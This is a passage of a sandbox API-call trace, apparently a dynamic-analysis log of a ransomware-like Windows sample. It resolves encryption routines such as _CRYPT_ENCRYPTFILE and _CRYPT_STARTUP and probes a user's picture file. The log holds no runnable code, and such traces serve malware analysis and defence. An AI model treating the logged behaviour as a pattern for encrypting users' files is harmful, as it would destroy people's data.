| out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0191.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0191.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.695] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0191.695] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.695] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0191.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0191.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0191.696] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0191.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0191.696] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0191.696] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0191.696] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0191.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0191.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.696] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0191.696] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0191.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0191.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0191.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0191.696] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.696] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.697] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0191.697] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.697] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0191.697] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.697] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950c5350, ftCreationTime.dwHighDateTime=0x1d5de5f, ftLastAccessTime.dwLowDateTime=0xf3d6a560, ftLastAccessTime.dwHighDateTime=0x1d5e1ad, ftLastWriteTime.dwLowDateTime=0xf3d6a560, ftLastWriteTime.dwHighDateTime=0x1d5e1ad, nFileSizeHigh=0x0, nFileSizeLow=0x7498, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="xsLu.jpg", cAlternateFileName="")) returned 0x90add8 [0191.698] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.698] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0191.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0191.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0191.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0191.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0191.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0191.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0191.698] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0191.698] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950c5350, ftCreationTime.dwHighDateTime=0x1d5de5f, ftLastAccessTime.dwLowDateTime=0xf3d6a560, ftLastAccessTime.dwHighDateTime=0x1d5e1ad, ftLastWriteTime.dwLowDateTime=0xf3d6a560, ftLastWriteTime.dwHighDateTime=0x1d5e1ad, nFileSizeHigh=0x0, nFileSizeLow=0x7498, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="xsLu.jpg", cAlternateFileName="")) returned 0x90add8 [0191.698] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.698] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0191.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0191.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.699] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.699] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.700] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\xsLu.jpg\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.700] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0191.700] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0191.700] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0191.700] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.700] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0191.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0191.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.701] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".jpg", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.701] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0191.701] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.701] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.702] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0191.702] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.702] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0191.702] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0191.702] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\xsLu.jpg", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950c5350, ftCreationTime.dwHighDateTime=0x1d5de5f, ftLastAccessTime.dwLowDateTime=0xf3d6a560, ftLastAccessTime.dwHighDateTime=0x1d5e1ad, ftLastWriteTime.dwLowDateTime=0xf3d6a560, ftLastWriteTime.dwHighDateTime=0x1d5e1ad, nFileSizeHigh=0x0, nFileSizeLow=0x7498, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="xsLu.jpg", cAlternateFileName="")) returned 0x90af58 [0191.702] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0191.703] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0191.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0191.703] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.703] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0191.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.703] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.703] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0191.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0191.703] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0191.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0191.703] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0191.703] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0191.703] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2838 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.704] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.704] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0191.704] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0191.704] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.704] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df190 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0191.704] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0191.704] RtlAllocateHeap (HeapHandle=0x8a0000, 